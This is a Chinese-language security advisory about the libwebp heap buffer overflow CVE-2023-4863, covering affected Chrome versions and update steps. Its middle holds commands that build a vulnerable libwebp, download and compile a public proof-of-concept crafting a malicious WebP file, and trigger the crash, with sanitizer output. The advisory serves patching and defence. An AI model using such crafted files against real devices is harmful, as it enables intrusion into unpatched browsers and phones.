一、漏洞概述
WebP圖像編解碼庫(kù)libwebp存在堆緩沖區(qū)溢出漏洞(CVE-2023-4863),攻擊者可以通過(guò)發(fā)送植入惡意代碼的WebP圖像獲得設(shè)備的部分權(quán)限。
WebP是由Google開(kāi)發(fā)的一種圖像格式,可為網(wǎng)絡(luò)圖像提供有損和無(wú)損壓縮。它旨在減小圖像的文件大小,同時(shí)不損失其視覺(jué)質(zhì)量。Google Chrome是由Google開(kāi)發(fā)的一款支持WebP圖像格式的網(wǎng)頁(yè)瀏覽器。
由于libwebp的使用范圍廣泛,不僅應(yīng)用于各大瀏覽器,還包含在系統(tǒng)的底層庫(kù)中 (例如:Android),以及目前滿大街都是的Electron中無(wú)一例外均使用了libwebp 庫(kù)。請(qǐng)各位盡快更新瀏覽器及使用Electron技術(shù)的相關(guān)應(yīng)用。
但CVE-2023-4863并未包含在Google即將在下月發(fā)布的10月安全更新之中 (一般 Google會(huì)提前半個(gè)月至一個(gè)月向合作廠商發(fā)布下月安全補(bǔ)丁,以便廠商能夠迅速修復(fù)漏洞),考慮到該漏洞已經(jīng)可能有野外利用的例子,Android設(shè)備目前相對(duì)而言還是比較危險(xiǎn)的,不知Google后續(xù)是否有額外更新計(jì)劃來(lái)緊急修復(fù)該漏洞。否則按現(xiàn)有更新計(jì)劃,可能就要等到11月安全補(bǔ)丁才會(huì)修復(fù)了。
也希望Google能夠像之前爆出藍(lán)牙漏洞時(shí)那樣,為已經(jīng)停止支持的舊設(shè)備 (如 Pixel 4a) 提供計(jì)劃外安全更新。 補(bǔ)充:根據(jù)Mishaal Rahman老師的消息,Google有可能推出2023-10-06安全補(bǔ)丁等級(jí)來(lái)專門修復(fù)該漏洞,但若廠商無(wú)意更新,則還要遲至11月安全補(bǔ)丁才會(huì)修復(fù)。
# checkout webp $ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test $ cd webp_test/ # checkout vulnerable version $ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0 # enable AddressSanitizer $ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix # build webp $ make -f makefile.unix $ cd examples/ # fetch mistymntncop's proof-of-concept code $ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c # build and run proof-of-concept $ gcc -o craft craft.c $ ./craft bad.webp # test trigger file $ ./dwebp bad.webp -o test.png ================================================================= ==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80 WRITE of size 1 at 0x626000002f28 thread T0 #0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) #1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7) #2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff) #3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5) #4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216) #5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b) #6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06) #7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026) #8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308 #9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d) 0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28) allocated by thread T0 here: #0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable ...
二、影響范圍
Google Chrome(Windows)版本 < 116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 < 116.0.5845.187
三、安全措施3.1升級(jí)版本
目前該漏洞已經(jīng)修復(fù),受影響用戶可升級(jí)到以下版本:
Google Chrome(Windows)版本 >=116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 >=116.0.5845.187
四、下載地址
五、手動(dòng)檢查更新可在Chrome 菜單-【幫助】-【關(guān)于 Google Chrome】檢查版本更新,并在更新完成后重新啟動(dòng)。 ? ? 升級(jí)后的版本號(hào):Version 117.0.5938.92 (Official Build) (64-bit)
審核編輯:湯梓紅
-
Android
+關(guān)注
關(guān)注
12文章
3917瀏覽量
127036 -
Google
+關(guān)注
關(guān)注
5文章
1754瀏覽量
57376 -
代碼
+關(guān)注
關(guān)注
30文章
4722瀏覽量
68231
原文標(biāo)題:WebP圖像編解碼庫(kù)libwebp存在堆緩沖區(qū)溢出漏洞(升級(jí)Google Chrome瀏覽器為最新版本)
文章出處:【微信號(hào):哆啦安全,微信公眾號(hào):哆啦安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
評(píng)論